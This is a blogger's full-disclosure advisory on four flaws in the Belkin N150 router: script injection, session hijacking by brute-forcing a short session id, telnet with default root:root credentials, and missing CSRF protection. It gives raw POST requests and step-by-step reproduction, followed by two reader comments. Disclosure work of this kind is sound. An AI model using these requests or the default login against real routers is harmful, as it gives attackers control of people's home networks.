Belkin N150 Router Multiple Vulnerabilities

Full Disclosure:
Recently, I encountered some vulnerabilities in Belkin N150 Router. Reported it to the vendor and haven’t  got any reply from Belkin Security Team.

→ Vulnerability/BUG Report :

1)
• Vulnerability Title : HTML/Script Injection
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

“InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language” this parameter is vulnerable.

1_vul_code→ Steps to Reproduce:

Send the following post request using Burpsuite,etc

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260

%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language=”>alert(“1”)<script>”&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&
getpage=html%2Findex.html&errorpage=html%2Findex.html&
var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D

2)
• Vulnerability Title : Session Hijacking
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

sessionid is allocated using hex encoding and of fixed length i.e 8 . Therefore, it is very easy to bruteforce it in feasible amount for time as this session id ranges from 00000000 to ffffffff

→ Steps to Reproduce:

Send the following request using Burpsuite and Bruteforce the sessionid.

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

3)
• Vulnerability Title : Telnet Enabled with Default Pass
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Vulnerability Details:

Telnet protocol can be used by an attacker to gain remote access to the router with root privileges.

→ Proof of Concept:

3_telnet

→ Steps to Reproduce:

1) Open terminal
2) Type following command:
telnet 192.168.2.1
3) Default user and pass is root:root

4)
• Vulnerability Title : Cross Site Request Forgery
• Browser : Firefox 41
• OS : Ubuntu 14.04
• Vulnerable : Belkin N150 Wireless Home Network Router
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

Request doesn’t contain any CSRF-token. Therefore, requests can be forged. It can be verified with any request.

Public ref:
http://www.securityfocus.com/archive/1/537000/30/0/threaded
https://packetstormsecurity.com/files/134564/Belkin-N150-XSS-CSRF-Session-Hijacking.html

Advertisements

7 thoughts on “Belkin N150 Router Multiple Vulnerabilities

  1. Hi Rahul,

    I’m Fed from Italy, I’m an InfoSec student and I find your wordpress articles really interesting, thanks for sharing your results. I’m trying to get a hold of one of these Belkin routers so I can conduct some research on my own but there seems to be a large number of different devices corresponding to the Belkin N150 router description, most of them with the F9K1001 model id. Do you think these will work? The only F9K1009 device i can find here in Europe is this one>:

    http://www.ebay.it/itm/Belkin-150Mbps-Wireless-N-Cable-Fiber-Router-N150-4-Port-F9K1009uk-Brand-New-/281836563884?hash=item419ec4adac:g:SpsAAOSw~bFWKgOP

    Does that look like the compromised device?

    Thanks for your time.

    Like

  2. I sent their security team the link to your exploit db link, and still haven’t gotten a reply. It’s been about a week since I’ve sent it.

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s